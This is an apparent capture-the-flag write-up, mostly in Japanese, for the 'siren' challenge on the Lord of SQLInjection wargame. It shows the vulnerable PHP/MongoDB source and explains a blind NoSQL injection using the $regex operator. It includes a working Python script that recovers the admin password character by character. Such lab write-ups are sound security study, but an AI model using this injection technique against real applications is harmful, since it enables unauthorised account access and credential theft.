Lord of SQLInjection

<?php
include "./config.php";
login_chk();
$db = mongodb_connect();
$query = array(
    "id" => $_GET['id'],
    "pw" => $_GET['pw']
);
echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>";
$result = mongodb_fetch_array($db->prob_siren->find($query));
if($result['id']) echo "<h2>Hello User</h2>";

$query = array("id" => "admin");
$result = mongodb_fetch_array($db->prob_siren->find($query));
if($result['pw'] === $_GET['pw']) solve("siren");
highlight_file(__FILE__);

特徴は以下。

• MongoDB
• id,pwが入力可能
• adminのpwを特定する必要がある

Blind NoSQL Injection (for MongoDB)

Blind NoSQL Injectionをやる。

• $regexを使う
  • ?id=admin&pw[$regex]=^abcとすると、{"id":"admin", "pw": {"$regex": "^abc"}}となり、pwを正規表現で取ってこれる
  • これをlike文のように使って抜き出す

import requests

url = "https://los.rubiya.kr/chall/siren_9.php"
cookie = {'PHPSESSID': 'fq5'}

def check(data) -> bool:
    return ("Hello admin" in data) or ("Hello guest" in data) or ("<h2>Hello User</h2>" in data)

ans = ""
for i in range(0, 1010):
    ok = False
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ,":
        q = f"^{ans}{c}"
        res = requests.get(url, params={'id': 'admin', 'pw[$regex]': q}, cookies=cookie)
        if check(res.text):
            ans += c
            ok = True
            break
    if not ok:
        break
    print(f"[*] {ans}")
print(f"[*] find! {ans}")